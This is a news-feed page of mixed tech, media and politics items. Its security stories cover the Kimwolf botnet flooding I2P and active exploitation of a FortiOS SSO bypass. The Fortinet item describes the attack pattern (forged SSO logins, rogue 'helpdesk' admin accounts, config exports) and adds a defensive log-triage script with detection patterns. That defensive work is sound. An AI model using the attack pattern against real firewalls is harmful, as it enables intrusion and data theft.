Learn this from Bezos and the Washington Post: with hypercapitalists in charge, your news is not safe | Jane Martinson

His shameful stewardship of a once great title highlights how much we lose when private interest eclipses the public good

Not long after being made Time magazine’s Person of the Year in 1999, Jeff Bezos told me: “They were not choosing me as much as they were choosing the internet, and me as a symbol.” A quarter of an increasingly dark century later, the Amazon founder is now a symbol of something else: how the ultra-rich can kill the news.

Job cuts in an industry that has struggled financially since the internet came into existence and killed its business model are hardly new, but last week’s brutal cull of hundreds of journalists at the Bezos-owned Washington Post marks a new low. The redundancies that were announced to staff on a video call, the axing of half its foreign bureau (including the war reporter in Ukraine) – not since P&O Ferries have layoffs been handled so badly. Former Post stalwart Paul Farhi described a decision that affected nearly half of the 790-strong workforce as “the biggest one-day wipeout of journalists in a generation”.

© Photograph: Wally McNamee/Corbis/Getty Images

  •  

‘My husband burned down our house – then the bank threatened repossession’

A family struggled to rebuild their lives after an abusive marriage ended in tragedy and financial ruin

Family life ended for Francesca Onody on a late summer evening in 2022 when her abusive husband doused their cottage with petrol as police arrived to arrest him. She and her children escaped seconds before the building exploded. Her husband Malcolm Baker died in the blaze.

That night, Onody lost her husband, her home, her pets and her possessions.

© Composite: Guardian Design/Getty Images

  •  

Social inequality is thriving in the hive | Brief letters

Beehive socialism | Ratcliffe’s apology | Tommy Cooper’s dream | Valentine’s Day | Love boat

The beehive may not be quite the utopian dream it first appears to be (Letters, 9 February). Worker bees need to be so active during the summer months that they typically only survive for about four to six weeks. Drone bees’ longevity is not much better. The lucky ones may get to service the queen, but die as a consequence. Unsurprisingly, the queen fares much better.
Tom Challenor
Ealing, London

• So Jim Ratcliffe is sorry for his choice of language use in relation to immigration (Report, 12 February). What about being sorry for his sentiments? Could I suggest that he spends a week as a bed-bound inpatient in an NHS hospital before he makes a judgment about the contribution of immigrants?
Liz Thompson
Oxford

© Photograph: Frans Lemmens/Alamy

  •  

It took two years, but Google released a YouTube app on Vision Pro

When Apple's Vision Pro mixed reality headset launched in February 2024, users were frustrated at the lack of a proper YouTube app—a significant disappointment given the device's focus on video content consumption, and YouTube's strong library of immersive VR and 360 videos. That complaint continued through the release of the second-generation Vision Pro last year, including in our review.

Now, two years later, an official YouTube app from Google has launched on the Vision Pro's app store. It's not just a port of the iPad app, either—it has panels arranged spatially in front of the user as you'd expect, and it supports 3D videos, as well as 360- and 180-degree ones.

YouTube's App Store listing says users can watch "every video on YouTube" (there's a screenshot of a special interface for Shorts vertical videos, for example) and that they get "the full signed-in experience" with watch history and so on.


© YouTube

  •  

Guardian view on Sir Jim Ratcliffe: Britain does not need political lectures from a billionaire tax exile | Editorial

Comments on the ‘colonisation of the UK’ by the co-owner of Manchester United were erroneous, crass and a gift to divisive forces in British society

In 2020, the year Sir Jim Ratcliffe moved his huge fortune to Monaco, migrants in the United Kingdom made tax contributions estimated to be worth around £20bn. Sir Jim, by jetting off to a tax haven on the French Riviera, saved himself an estimated £4bn. It took some brass neck for the expat owner of Ineos and co-owner of Manchester United football club to lecture the country, using inflammatory and offensive language, on the perils of immigration.

Where to begin? The statistics used by Sir Jim to back his claim that Britain was being “colonised” by migrants, in an interview with Sky News, were flatly wrong. They were also astonishingly crass, coming from a man who presides over a sporting institution famous for and proud of its global fanbase and international connections.

Do you have an opinion on the issues raised in this article? If you would like to submit a response of up to 300 words by email to be considered for publication in our letters section, please click here.

© Photograph: Nicolò Campo/LightRocket/Getty Images

  •  

Wuthering Heights set to ravish Valentine’s weekend box office

Early projections suggest Emerald Fennell’s adaptation could recoup its $80m production budget in its opening three days – with strong US and overseas takings expected

The titillating trailers and method-dressed promotional tour appear to have paid off: early indications are that Emerald Fennell’s Wuthering Heights will earn back its $80m (£59m) production budget on the first weekend of release.

Projections estimate the three-day frame, which falls on Valentine’s weekend, should recoup around $50m (£37m) at the US box office – where it opens across 3,600 screens – and a further $40m (£29m) overseas.

© Photograph: AP

  •  

Kimwolf Botnet Swamps Anonymity Network I2P

For the past week, the massive “Internet of Things” (IoT) botnet known as Kimwolf has been disrupting The Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet’s control servers.

Kimwolf is a botnet that surfaced in late 2025 and quickly infected millions of systems, turning poorly secured IoT devices like TV streaming boxes, digital picture frames and routers into relays for malicious traffic and abnormally large distributed denial-of-service (DDoS) attacks.

I2P is a decentralized, privacy-focused network that allows people to communicate and share information anonymously.

“It works by routing data through multiple encrypted layers across volunteer-operated nodes, hiding both the sender’s and receiver’s locations,” the I2P website explains. “The result is a secure, censorship-resistant network designed for private websites, messaging, and data sharing.”

On February 3, I2P users began complaining on the organization’s GitHub page about tens of thousands of routers suddenly overwhelming the network, preventing existing users from communicating with legitimate nodes. Users reported a rapidly increasing number of new routers joining the network that were unable to transmit data, and that the mass influx of new systems had overwhelmed the network to the point where users could no longer connect.

I2P users complaining about service disruptions from a rapidly increasing number of routers suddenly swamping the network.

When one I2P user asked whether the network was under attack, another user replied, “Looks like it. My physical router freezes when the number of connections exceeds 60,000.”

A graph shared by I2P developers showing a marked drop in successful connections on the I2P network around the time the Kimwolf botnet started trying to use the network for fallback communications.

The same day that I2P users began noticing the outages, the individuals in control of Kimwolf posted to their Discord channel that they had accidentally disrupted I2P after attempting to join 700,000 Kimwolf-infected bots as nodes on the network.

The Kimwolf botmaster openly discusses what they are doing with the botnet in a Discord channel with my name on it.

Although Kimwolf is known as a potent weapon for launching DDoS attacks, the outages caused this week by some portion of the botnet attempting to join I2P are what’s known as a “Sybil attack,” a threat in peer-to-peer networks where a single entity can disrupt the system by creating, controlling, and operating a large number of fake, pseudonymous identities.

Indeed, the number of Kimwolf-infected routers that tried to join I2P this past week was many times the network’s normal size. I2P’s Wikipedia page says the network consists of roughly 55,000 computers distributed throughout the world, with each participant acting as both a router (to relay traffic) and a client.

However, Lance James, founder of the New York City-based cybersecurity consultancy Unit 221B and the original founder of I2P, told KrebsOnSecurity the entire I2P network now consists of between 15,000 and 20,000 devices on any given day.

An I2P user posted this graph on Feb. 10, showing tens of thousands of routers — mostly from the United States — suddenly attempting to join the network.

Benjamin Brundage is founder of Synthient, a startup that tracks proxy services and was the first to document Kimwolf’s unique spreading techniques. Brundage said the Kimwolf operator(s) have been trying to build a command and control network that can’t easily be taken down by security companies and network operators that are working together to combat the spread of the botnet.

Brundage said the people in control of Kimwolf have been experimenting with using I2P and a similar anonymity network — Tor — as a backup command and control network, although there have been no reports of widespread disruptions in the Tor network recently.

“I don’t think their goal is to take I2P down,” he said. “It’s more they’re looking for an alternative to keep the botnet stable in the face of takedown attempts.”

The Kimwolf botnet created challenges for Cloudflare late last year when it began instructing millions of infected devices to use Cloudflare’s domain name system (DNS) settings, causing control domains associated with Kimwolf to repeatedly usurp Amazon, Apple, Google and Microsoft in Cloudflare’s public ranking of the most frequently requested websites.

James said the I2P network is still operating at about half of its normal capacity, and that a new release is rolling out which should bring some stability improvements over the next week for users.

Meanwhile, Brundage said the good news is Kimwolf’s overlords appear to have quite recently alienated some of their more competent developers and operators, leading to a rookie mistake this past week that caused the botnet’s overall numbers to drop by more than 600,000 infected systems.

“It seems like they’re just testing stuff, like running experiments in production,” he said. “But the botnet’s numbers are dropping significantly now, and they don’t seem to know what they’re doing.”

  •  

Smart home PSA: Apple's "new architecture" for Home app becomes mandatory today

In 2022, Apple announced it was adopting a "new Home architecture" for its smart home ecosystem to improve its performance and reliability and make it possible to support different kinds of accessories. Although it was mostly an invisible update when it worked properly, some users who attempted to switch to the new architecture when it first rolled out in iOS 16.2 ran into slow or unresponsive devices and other problems, prompting Apple to pause the rollout and re-release it as part of iOS 16.4.

If you put off transitioning to the new architecture because of those early teething problems or for some other reason, Apple is forcing the issue starting today: You'll need to update to the new Home architecture if you want to continue using the Home app, and older iOS and macOS versions that don't support the new architecture will no longer be able to control your smart home devices. The old version of the Home app and the old Home/HomeKit architecture are no longer supported.

If you're like me, you hit an "upgrade" button in your Home app years ago and then mostly forgot about it—if you open the Home app on a modern iPhone, iPad, or Mac and don't see an update prompt, it means you're already using the updated architecture and don't need to worry about it.


© nurPhoto / Getty Images

  •  

Kimwolf Botnet Swamps Anonymity Network I2P

For the past week, the massive "Internet of Things" (IoT) botnet known as Kimwolf has been disrupting The Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet's control servers.

The post Kimwolf Botnet Swamps Anonymity Network I2P appeared first on Security Boulevard.

  •  

Redox gets working rustc and Cargo

Another month, another Redox progress report. January turned out to be a big month for the Rust-based general purpose operating system, as they’ve got cargo and rustc working on Redox.

Cargo and rustc are now working on Redox! Thanks to Anhad Singh and his southern-hemisphere Redox Summer of Code project, we are now able to compile your favorite Rust CLI and TUI programs on Redox. Compilers are often one of the most challenging things for a new operating system to support, because of the intensive and somewhat scattershot use of resources.

↫ Ribbon and Ron Williams

That’s not all for January, though. An initial capability-based security infrastructure has been implemented for granular permissions, SSH support has been improved and now works properly for remoting into Redox sessions, and USB input latency has been massively reduced. You can now also add, remove, and change boot parameters in a new text editing environment in the bootloader, and the login manager now has power and keyboard layout menus. January also saw the first commit made entirely from within Redox, which is pretty neat.

Of course, there’s much more, as well as the usual slew of kernel, relibc, and application bugfixes and small changes.

  •  

A Project Hail Mary final trailer? Yes please.

Sure, most Americans are glued to their TVs for today's Super Bowl and/or the Winter Olympics. But for the non-sports minded, Amazon MGM Studios has released one last trailer for its forthcoming space odyssey Project Hail Mary, based on Andy Weir’s (The Martian) bestselling 2021 novel about an amnesiac biologist-turned-schoolteacher in space.

As previously reported, Amazon MGM Studios acquired the rights for Weir’s novel before it was even published and brought on Drew Goddard to write the screenplay. (Goddard also wrote the adapted screenplay for The Martian, so he’s an excellent choice.) The studio tapped Phil Lord and Christopher Miller (Cloudy with a Chance of Meatballs, The LEGO Movie) to direct and signed on Ryan Gosling to star. Per the official premise:

Science teacher Ryland Grace (Ryan Gosling) wakes up on a spaceship light years from home with no recollection of who he is or how he got there. As his memory returns, he begins to uncover his mission: solve the riddle of the mysterious substance causing the sun to die out. He must call on his scientific knowledge and unorthodox ideas to save everything on Earth from extinction… but an unexpected friendship means he may not have to do it alone.

In addition to Gosling, the cast includes Sandra Huller as head of the Hail Mary project and Ryland’s superior; Milana Vayntrub as project astronaut Olesya Ilyukhina; Ken Leung as project astronaut Yao Li-Jie; Liz Kingsman as Shapiro; Orion Lee as Xi; and James Ortiz as a new life form Ryland names Rocky.


© YouTube/Amazon MGM Studios

  •  

Washington Post C.E.O. Will Lewis Steps Down After Stormy Tenure

His departure came days after the company cut 30 percent of the staff. He will be replaced in the interim by Jeff D’Onofrio, the chief financial officer, the company said.

© Carlotta Cardana/Bloomberg

Will Lewis, the chief executive and publisher of The Washington Post, has stepped down, the company announced Saturday.

  •  

Avocados are a Super Bowl staple – but are they truly a miracle food?

Americans are expected to devour nearly 280m pounds of avocados during Super Bowl weekend. Are they actually healthy?

Most American adults today didn’t grow up with avocados, but we’ve certainly developed a hearty appetite for them. In 1990, the United States imported 38m pounds of avocados; by 2023, that number was 2,789m, mostly from Mexico.

On average, each of us eats about 20 avocados, or 9lbs of the fruit, a year – a sixfold increase from 1998. Super Bowl guacamole alone fuels a staggering demand for the fruit; in the lead-up to this Sunday’s game, Americans are expected to devour nearly 280m pounds of avocados, a historical record.

© Photograph: Olesia Shadrina/Getty Images

  •  

Why $700 could be a "death sentence" for the Steam Machine

After writing two November stories analyzing price expectations for Valve's upcoming Steam Machine, I really didn't think we'd be offering more informed speculation before the official price was revealed. Then Valve wrote a blog post this week noting that the "growing price of... critical components" like RAM and storage meant that "we must revisit our exact shipping schedule and pricing" for the living room-focused PC gaming box.

We don't know exactly what form that "revisiting" will take at the moment. Analysts who spoke to Ars were somewhat divided on how much of its quickly increasing component costs Valve would be willing (or forced) to pass on to consumers.

"We knew the component issue was bad," DFC Intelligence analyst David Cole told Ars. "It has just gotten worse."


© Getty Images

  •  

Watch Kanzi the bonobo pretend to have a tea party

Little kids hosting make-believe tea parties is a fixture of childhood playtime and long presumed to be exclusively a human ability. Researchers at Johns Hopkins University presented evidence in a new paper published in the journal Science that a bonobo named Kanzi was also able to participate in pretending to hold a tea party. For the authors, this suggests that apes are capable of using their imagination just like human toddlers.

"It really is game-changing that their mental lives go beyond the here and now," said co-author Christopher Krupenye. "Imagination has long been seen as a critical element of what it is to be human, but the idea that it may not be exclusive to our species is really transformative. Jane Goodall discovered that chimps make tools, and that led to a change in the definition of what it means to be human, and this, too, really invites us to reconsider what makes us special and what mental life is out there among other creatures."

Per Krupenye et al., by the age of two, human children are able to navigate imaginary scenarios like a tea party, pretending there is real tea present even if the teapot and cups are actually empty. Cognitively speaking, it's an example of secondary representation, because it involves decoupling an imagined or simulated state (pretending there is actual tea in the cup) from the reality (the cup is empty).


© courtesy of Ape Initiative

  •  

Steam Machine and Steam Frame delays are the latest product of the RAM crisis

When Valve announced its Steam Machine desktop PC and Steam Frame VR headset in mid-November of last year, it declined to announce pricing or availability information for either device. That was partly because RAM and storage prices had already begun to climb due to shortages caused by the AI industry's insatiable need for memory. Those price spikes have only gotten worse since then, and they're beginning to trickle down to GPUs and other devices that use memory chips.

This week, Valve has officially announced that it's still not ready to make an official announcement about when the Machine or Frame will be available or what they'll cost.

Valve says it still plans to launch both devices (as well as the new Steam Controller) "in the first half of the year," but that uncertainty around RAM and storage prices mean that Valve "[has] work to do to land on concrete pricing and launch dates we can confidently announce, being mindful of how quickly the circumstances around both of these things can change."


© Valve

  •  

Google court filings suggest ChromeOS has an expiration date

Chromebooks debuted 16 years ago with the limited release of Google's Cr-48, an unassuming compact laptop that was provided free to select users. From there, Chromebooks became one of the most popular budget computing options and a common fixture in schools and businesses. According to some newly uncovered court documents, Google's shift to Android PCs means Chromebooks have an expiration date in 2034.

The documents were filed as part of Google's long-running search antitrust case, which began in 2020 and reached a verdict in 2024. While Google is still seeking to have the guilty verdict overturned, it has escaped most of the remedies that government prosecutors requested. According to The Verge, the company's plans for Chromebooks and the upcoming Android-based Aluminium came up in filings from the remedy phase of the trial.

As Google moves toward releasing Aluminium, it sought to keep the upcoming machines above the fray and retain the Chrome browser (which it did). In Judge Amit Mehta's final order, devices running ChromeOS or a ChromeOS successor are excluded. To get there, Google had to provide a little more detail on its plans.


© Google

  •  

Security Is Shifting From Prevention to Resilience


Dan Cole, senior vice president of product management at Sophos, unpacks how cybersecurity strategy is shifting from a prevention-first mindset toward resilience and response. Cole traces his career from the early days of mass malware outbreaks like Melissa and ILOVEYOU through today’s environment of nation-state actors, AI-assisted attacks, and sprawling hybrid workforces. While the tools..

The post Security Is Shifting From Prevention to Resilience appeared first on Security Boulevard.

  •  

Everything you ever wanted to know about Amiga UNIX

We recently talked about Apple’s pre-Mac OS X dabblings in UNIX, but Apple wasn’t the only computer and operating system company exploring UNIX alternatives. Microsoft had the rather successful Xenix, Atari had ASV, Sony had NEWS, to name just a very small few. The Amiga, too, wanted in on the UNIX action, and as such, released Amiga UNIX, based on AT&T System V Release 4. The Amiga UNIX website is dedicated to everything you would ever want to know about this operating system.

This site is dedicated to preserving Amix’s history and sharing information and instructions on what Amix is, how to install it (either on real hardware or in emulation) and what you can do with it. Mainly, it tries to cater to people who wish to run AMIX for whatever reason on their hardware. By documenting experiences with it, it is hoped that subsequent SVR4 junkies will find the way more smooth than it might have been without any guidance at all. For even a relatively experienced modern Unix or GNU/Linux administrator, System V UNIX is sufficiently different to present difficulty in installation and administration. Not so much in moving around between directories, and using common utilities that persist to this day – although many of those are hoary and somewhat forgetful in their retirement – but of doing more in depth tasks and understanding the differences.

↫ The Amiga Unix Wiki

If you wish to run Amiga UNIX yourself, you’ll either have to have one of the original two models sold with it – the 2500UX and 3000UX – or one of the Amigas that meets the minimum requirements. Another option is, of course, emulation, and WinUAE has support for running Amiga UNIX.

  •  

ReactOS turns 30

ReactOS is celebrating its 30th birthday.

Happy Birthday ReactOS! Today marks 30 years since the first commit to the ReactOS source tree. It’s been such a long journey that many of our contributors today, including myself, were not alive during this event. Yet our mission to deliver “your favorite Windows apps and drivers in an open-source environment you can trust” continues to bring people together. Let’s take a brief look at some of the high and low points throughout our history.

↫ Carl Bialorucki at the ReactOS website

OSNews has been following ReactOS since about 2002 or so (the oldest reference I could find, but note that our 1997-2001 content isn’t available online, so we may have mentioned it earlier), so you can definitely say we all grew up alongside ReactOS’ growth and development. All of the events the team mentions in their retrospective on 30 years of ReactOS were covered here on OSNews as well, which is wild to think about.

Personally, I don’t really know how to feel about the project. On the one hand, I absolutely adore that dedicated, skilled, and talented individuals dedicate their precious free time to something as ambitious as creating a Windows NT-compatible operating system, and there’s no denying they’ve achieved incredible feats of engineering few people in the world are capable of. ReactOS is a hobby operating system that survived the test of time where few others have – AtheOS, Syllable, SkyOS, and so many others mentioned in that oldest reference I linked to are long dead and gone – and that alone makes it a massively successful project.

On the other hand, its sheer ambition is also what holds the project down. If you say you’re going to offer a Windows NT-compatible operating system, you set expectations so insanely high you’ll never even come close to meeting them. Every time I’ve seen someone try ReactOS, either in writing or on YouTube, they always seem to come away disappointed – not because ReactOS isn’t impressive, but because it’s inevitably so far removed from its ambitious goals.

And that’s a real shame. If you take away that ambitious goal of being Windows NT-compatible, and just focus on what they’ve already achieved as it stands now, there’s a really impressive and fun alternative operating system here. I really hope the next 30 years will be kind to ReactOS.

  •  

Fortinet Admins Report Active Exploits on “Fixed” FortiOS 7.4.9 Firmware


Network administrators worldwide are scrambling this morning following credible reports that the critical Fortinet Single Sign-On (SSO) vulnerability, tracked as CVE-2025-59718, is being actively exploited on systems previously thought to be patched.

The vulnerability, originally disclosed in December 2025, allows unauthenticated attackers to bypass authentication on FortiGate firewalls by forging SAML assertions. At the time, Fortinet released FortiOS version 7.4.9 as the definitive fix for the 7.4 release branch. However, emerging data from the cybersecurity community suggests this update may have failed to close the door on attackers.

The "Zombie" FortiOS Vulnerability

Over the last 48 hours, a wave of reports has surfaced on community hubs like Reddit, where verified administrators have shared logs indicating successful breaches on devices running the supposedly secure FortiOS 7.4.9.

The attack pattern is distinct and alarming. Victims report observing unauthorized logins via the FortiCloud SSO mechanism—even when they do not actively use the feature for their own administration. Once access is gained, the attackers typically create a local administrator account, often named "helpdesk" or similar generic terms, to establish persistence independent of the SSO flaw.

"We have been on 7.4.9 since December 30th," wrote one frustrated administrator who shared redacted logs of the incident. "Our SIEM caught a local admin account being created. The attack vector looks exactly like the original CVE-2025-59718 exploit, but against the patched firmware."

Technical Confusion and Workarounds

The persistence of this flaw in version 7.4.9 has led to speculation that the initial patch was incomplete or that attackers have found a bypass to the mitigation logic. Some users report that Fortinet support has acknowledged the issue privately, hinting that the vulnerability might persist even into upcoming builds like 7.4.10, though this remains unconfirmed by official public advisories.

The exploit relies on the "Allow administrative login using FortiCloud SSO" setting, which is often enabled by default when a device is registered to FortiCloud.

Security experts are now advising a "trust no patch" approach for this specific vector. The only guaranteed mitigation currently circulating in professional circles is to manually disable the vulnerable feature via the Command Line Interface (CLI), regardless of the firmware version installed.

Administrators are urged to run the following command immediately on all FortiGate units:

config system global
    set admin-forticloud-sso-login disable
end

Indicators of Compromise

Organizations running FortiOS 7.4.x—including version 7.4.9—should immediately audit their system event logs for the following activity:

  1. Unexpected SSO Logins: Filter logs for successful logins where the method is forticloud-sso, especially from unrecognized public IP addresses.

  2. New User Creation: Check for the recent creation of administrator accounts with names like helpdesk, support, or fortinet-admin.

  3. Configuration Exports: Look for logs indicating a full system configuration download shortly after an SSO login.
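One way to run the three checks above over exported event logs, as an added example that is not from the article or from Fortinet. The log lines are constructed in a simplified key=value form; the field names (action, status, method, cfgobj, msg, srcip), the 30-minute correlation window and the 10.0.0.0/8 trusted range are all assumptions to be mapped onto the real device's log schema.

```python
"""Triage the three indicators listed above over key=value event logs:
FortiCloud SSO logins, newly created admin accounts, and a full configuration
download shortly after an SSO login.

Added example, not Fortinet tooling. Field names are ASSUMED and the sample
lines are CONSTRUCTED; adapt parse_line() to the real FortiGate log schema.
"""
from datetime import datetime, timedelta
import ipaddress
import shlex
from typing import Dict, List

# Constructed sample events (not captured from any real device).
SAMPLE_LOGS = """\
date=2026-01-09 time=02:14:03 action=login status=success method=forticloud-sso user=admin srcip=203.0.113.45
date=2026-01-09 time=02:14:41 action=Add user=admin cfgobj=helpdesk msg="Add system.admin helpdesk"
date=2026-01-09 time=02:16:10 action=download user=helpdesk msg="Full system configuration downloaded" srcip=203.0.113.45
date=2026-01-09 time=09:00:12 action=login status=success method=local user=netops srcip=10.20.0.5
date=2026-01-09 time=09:02:30 action=Add user=netops cfgobj=jdoe msg="Add system.admin jdoe"
"""

# Account names the reports above associate with attacker persistence.
SUSPICIOUS_ADMIN_NAMES = ("helpdesk", "support", "fortinet-admin")
SSO_TO_EXPORT_WINDOW = timedelta(minutes=30)  # assumed correlation window

Event = Dict[str, str]


def parse_line(line: str) -> Event:
    """Split one key=value log line; shlex keeps quoted values intact."""
    event: Event = {}
    for token in shlex.split(line):
        key, sep, value = token.partition("=")
        if sep:
            event[key] = value
    return event


def parse_logs(text: str) -> List[Event]:
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def event_time(event: Event) -> datetime:
    return datetime.strptime(f"{event['date']} {event['time']}", "%Y-%m-%d %H:%M:%S")


def in_trusted_net(srcip: str, trusted_nets: List[str]) -> bool:
    """True when the source address falls inside an allow-listed CIDR."""
    try:
        addr = ipaddress.ip_address(srcip)
    except ValueError:  # missing or malformed address is never trusted
        return False
    return any(addr in ipaddress.ip_network(net, strict=False) for net in trusted_nets)


def find_sso_logins(events: List[Event], trusted_nets: List[str]) -> List[Event]:
    """Indicator 1: every successful forticloud-sso login, tagged by source."""
    hits = []
    for ev in events:
        if (ev.get("action") == "login" and ev.get("status") == "success"
                and ev.get("method") == "forticloud-sso"):
            hit = dict(ev)
            hit["from_trusted_net"] = in_trusted_net(ev.get("srcip", ""), trusted_nets)
            hits.append(hit)
    return hits


def find_admin_creations(events: List[Event]) -> List[Event]:
    """Indicator 2: new system.admin objects carrying attacker-style names."""
    return [
        ev for ev in events
        if ev.get("action") == "Add" and "system.admin" in ev.get("msg", "")
        and any(n in ev.get("cfgobj", "").lower() for n in SUSPICIOUS_ADMIN_NAMES)
    ]


def find_config_exports_after_sso(events: List[Event],
                                  window: timedelta = SSO_TO_EXPORT_WINDOW) -> List[Event]:
    """Indicator 3: a full configuration download within `window` after an SSO login."""
    sso_times = [event_time(ev) for ev in events
                 if ev.get("method") == "forticloud-sso" and ev.get("status") == "success"]
    hits = []
    for ev in events:
        if ev.get("action") == "download" and "configuration" in ev.get("msg", "").lower():
            t = event_time(ev)
            if any(timedelta(0) <= t - s <= window for s in sso_times):
                hits.append(ev)
    return hits


def triage(text: str, trusted_nets: List[str]) -> Dict[str, List[Event]]:
    """Run all three checks over raw log text and group the hits by indicator."""
    events = parse_logs(text)
    return {
        "sso_logins": find_sso_logins(events, trusted_nets),
        "admin_creations": find_admin_creations(events),
        "config_exports": find_config_exports_after_sso(events),
    }


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_LOGS, ["10.0.0.0/8"]).items():
        print(f"{name}: {len(hits)} hit(s)")
        for h in hits:
            print("   ", h.get("time"), h.get("user"), h.get("srcip", ""), h.get("msg", h.get("method", "")))
```

On the constructed sample the SSO login from 203.0.113.45, the "helpdesk" admin creation and the configuration download two minutes later are each flagged, while the local netops login and the "jdoe" account are not.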

As trust in the official patch cycle wavers, the community is once again serving as the first line of defense, sharing Indicators of Compromise (IOCs) and workarounds faster than vendors can issue bulletins. For now, disable the SSO feature, or risk compromise.

  •  

Can you slim macOS down?

Howard Oakley answers a very interesting question – is it possible to slim macOS down by turning off unneeded services and similar tricks? The answer is obviously no, you cannot.

Classic Mac OS was more modular, with optional installs that the user could pick and choose, as shown above in Mac OS 9.1. These days with the SSV, choice is more limited from the start, with the only real options being whether to install the cryptexes used in AI, and the x86 code translator Rosetta 2. The latter is transient, though, and likely to go away next year.

Like it or not, modern macOS isn’t designed or implemented to give the user much choice in which processes it runs, and architectural features including the SSV and DAS-CTS prevent you from paring its processes down to any significant degree.

↫ Howard Oakley

That’s because macOS is not about creating the best experience for the user, but about creating the most value for shareholders. Giving users choice, allowing them to modify their operating system to suit their needs, removing unneeded components or replacing them with competing alternatives just isn’t in the interest of shareholders, and thus, it’s not allowed by Apple. That’s exactly why they’re fighting the EU’s very basic and simple consumer protection legislation tooth and nail with lies and propaganda, while giving Trump millions of dollars and silly plaques in bribes.

You’re as much a user of macOS as a passenger on a ferry is its captain. If you just want to get from Harwich to Hoek van Holland, that’s a fine arrangement, but if you want to explore beyond the bounds of the path laid out by those more wealthy than you, you’re going to have to leave macOS behind and find a different ship.

  •  

Going immutable on macOS

Speaking of NixOS’ use of 9P, what if you want to, for whatever inexplicable reason, use macOS, but make it immutable? Immutable Linux distributions are getting a lot of attention lately, and similar concepts are used by Android and iOS, so it makes sense for people stuck on macOS to want similar functionality. Apple doesn’t offer anything to make this happen, but of course, there’s always Nix.

And I literally do mean always. Only try out Nix if you’re willing to first be sucked into a pit of despair and madness before coming out enlightened on the other end – I managed to only narrowly avoid this very thing happening to me last year, so be advised. Nix is no laughing matter.

Anyway, yes, you can use Nix to make macOS immutable.

But managing a good working environment on macOS has long been a game of “hope for the best.” We’ve all been there: a curl | sh here, a manual brew install there, and six months later, you’re staring at a broken PATH and a Python environment that seems to have developed its own consciousness.

I’ve spent a lot of time recently moving my entire workflow into a declarative system using nix. From my zsh setup to my odin toolchain, here is why the transition from the imperative world of Homebrew to the immutable world of nix-darwin has been both a revelation and a fight.

↫ Carette Antonin

Of course it’s been a fight – it’s Nix, after all – but it’s quite impressive and awesome that Nix can be used in this way. I would rather discover what electricity from light sockets tastes like than descend into this particular flavour of Nix madness, but if you’re really sick of macOS being a pile of trash for – among a lot of other things – homebrew and similar bolted-on systems held together by duct tape and spit, this might be a solution for you.

  •  

The world is on fire, so let’s look at pretty Amiga desktops

There’s so much shit going on in the world right now, and we can all use a breather. So, let’s join Carl Svensson and look at some pretty Amiga Workbench screenshots.

Combining my love for screenshots with the love for the Amiga line of computers, I’ve decided to present a small, curated selection of noteworthy Amiga Workbenches – Workbench being the name of the Amiga’s desktop environment.

↫ Carl Svensson

I love how configurable and flexible the Amiga Workbench is, and how this aspect of it has been embraced by the Amiga community. All of these screenshots demonstrate a sense of purpose, and clearly reflect the kind of things their users do with their Amigas. I think “Graphics Card Workbench #1 (1997)” speaks to me the most, striking a great balance between the blocky, pixelated “old” Amiga look, and the more modern late ’90s/early ’00s Amiga look. The icon set in that one also vaguely reminds me of BeOS, which is always a plus.

That being said, all of them look great and are instantly recognisable as Amiga desktops, and make me wish I had a modern Amiga capable of running Amiga OS 4.

  •  

Redox gets basic Linux DRM support

Since we moved to a new year, we also moved to a new month, and that means a new monthly report from Redox, the general purpose operating system written in Rust. The report obviously touches on the news we covered a few weeks ago that Redox now has the first tidbits of a modesetting driver for Intel hardware, but in addition to that, the project has also taken the first steps towards basic read-only APIs from Linux DRM, in order to use Linux graphics drivers. ARM64 now has dynamic linking support, POSIX compliance has been improved, and there are countless other improvements. Of course, there’s also the usual massive list of bug fixes and minor changes to the kernel, relibc, drivers, and so on.

I genuinely wish the Redox project another successful year. The team seems to have its head screwed on right, and is making considerable progress basically every month. I don’t know what the end goal is, but the way things are looking right now, I wouldn’t be surprised to see it come preinstalled on System76 laptops somewhere over the coming five years.

  •  

Taiwan Reports 2.6 Million Chinese Cyberattacks Per Day in 2025


Taiwan faced a surge in Chinese cyberattacks in 2025, with government data showing that the island’s critical infrastructure was targeted an average of 2.6 million times per day. According to Taiwan’s National Security Bureau, the scale, frequency, and coordination of these attacks suggest a sustained and deliberate campaign that intensified alongside military and political pressure from Beijing.

The bureau reported that Chinese cyberattacks against Taiwan’s key infrastructure rose 6% compared with the previous year. Sectors experiencing the most severe impact included energy systems, hospitals, banks, emergency rescue services, and telecommunications networks. The agency said the average number of daily attacks reached approximately 2.63 million in 2025, a 113% increase from 2023, when the bureau first began publishing such figures.

“These attacks indicate a deliberate attempt by China to compromise Taiwan’s crucial infrastructure comprehensively and to disrupt or paralyze Taiwanese government and social functions,” the report stated.

Chinese Cyberattacks Timed With Military Drills and Political Events

Taiwanese authorities said many of the Chinese cyberattacks were closely synchronized with Chinese military exercises and politically sensitive moments, reinforcing concerns over what Taipei describes as “hybrid warfare.” The bureau documented that China conducted 40 “joint combat readiness patrols” in 2025, involving military aircraft and naval vessels operating near Taiwan. Cyber activity escalated during 23 of those patrols.

The report cited specific incidents in which the attacks intensified during major political events. In May, cyber activity spiked when President Lai Ching-te delivered a speech marking his first year in office. Another escalation occurred in November when Vice President Hsiao Bi-khim spoke at a meeting with lawmakers at the European Parliament.

“China’s moves align with its strategic need to employ hybrid threats against Taiwan during both peacetime and wartime,” the report said.

Taiwan has repeatedly accused China of using a combination of daily military drills, disinformation campaigns, and cyber operations to weaken the island’s defenses and morale. Beijing claims Taiwan as its own territory and has not ruled out the use of force to bring the island under its control. Taipei rejects China’s sovereignty claims, stating that only Taiwan’s people can decide the island’s future, according to The Japan Times.

Hospitals, Energy Systems, and Banks Among Primary Targets

The National Security Bureau said the Chinese cyberattacks employed a wide range of techniques designed to disrupt daily life and undermine public trust. These included distributed denial-of-service (DDoS) attacks aimed at overwhelming networks and halting services, as well as man-in-the-middle attacks used to intercept communications, steal sensitive data, and penetrate telecommunications infrastructure.

Hospitals, emergency services, and energy providers experienced some of the sharpest year-on-year increases in attack volume. Banks and financial systems were also repeatedly targeted, raising concerns about broader economic disruption.

